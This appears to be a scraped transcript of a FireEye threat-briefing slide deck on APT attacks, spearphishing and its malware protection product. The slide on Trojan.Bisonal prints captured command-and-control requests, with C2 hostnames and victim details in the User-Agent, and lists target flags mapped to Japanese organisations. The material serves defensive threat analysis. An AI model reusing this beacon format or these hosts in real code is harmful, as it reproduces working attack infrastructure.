wMPS Dashboard

Download Report

Transcript wMPS Dashboard

Stopping Next-Gen Threats

Dan Walters – Sr. Systems Engineer Mgr.

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 2

"We're moving towards a world where every attack is effectively zero day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works."

-

Chris Young, GVP Cisco Security Tech Week Europe, September 28 th 2012

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 3

High Profile APT Attacks Are Increasingly Common Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 4

The Attack Lifecycle – Multiple Stages

Callback Server

1

Compromised Web server, or Web 2.0 site File Share 2 IPS

1

Exploitation of system

2

Malware binary download

3

Callbacks and control established DMZ File Share 1

2 3 5 Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL

Crimeware == for the $ Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 6

Advanced Persistent Threat == Human Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 7

This is Alex == FireEye Research Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 8

The Usual Suspects Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 9

Organized…Persistent… Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 10

Reconnaissance made easy… Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 11

The Exploit Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 12

LaserMotive Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 13

CEOs are targeted Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 14

Could you stop this?

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 15

The Callback Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 16

Hidden in plain view… Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 17

Blog Post?

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 18

RSS Feed?

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 19

We’re Only Human Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 20

HR make for easy targets Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 21

Just doing my job… Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 22

NATO is a frequent spearphish target Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 23

Global Unrest Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 24

Who’s Oil is it?

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 25

The curious case of Trojan.Bisonal

• Targets 100% Japanese organizations • Delivered via weaponized doc/xls files • Embeds the target name into the command and control traffic 26 Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL

Custom “Flag” and c2 domain GET /j/news.asp?id=* HTTP/1.1

User-Agent: flag:khi host:Business

IP:10.0.0.43 OS:XPSP3 vm: �� proxy: �� Host: online.cleansite.us Cache-Control: no-cache GET /a.asp?id=* HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: khi.acmetoy.com

Connection: Keep-Alive 27 Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL

Other “Flag”s seen • • • • • • • • • • • • • • • • • • • flag:410maff flag:1223 Flag:712mhi Flag:727x Flag:8080 Flag:84d flag:boat Flag:d2 Flag:dick flag:jsexe flag:jyt Flag:m615 flag:toray Flag:MARK 1

<-- ministry of agriculture, forestry, and fisheries <-- mitsubishi heavy industries

flag:nec01 Flag:qqq flag:nids flag:nsc516 flag:ihi <-- ihi corp

<-- nec corporation <-- national institute for defense studies (nids.go.jp) <-- nippon steel corp

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 28

China is not the only threat Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 29

Multi-Protocol, Real-Time VX Engine

PHASE 1

Multi-Protocol Object Capture

PHASE 1: WEB MPS

• Aggressive Capture • Web Object Filter

PHASE 1: E-MAIL MPS

• Email Attachments • URL Analysis

PHASE 2

Virtual Execution Environments

Map to Target OS and Applications DYNAMIC, REAL-TIME ANALYSIS

• Exploit detection • Malware binary analysis • Cross-matrix of OS/apps • Originating URL • Subsequent URLs • OS modification report • C&C protocol descriptors Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 30

Thank You!

FireEye - Modern Malware Protection System Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 31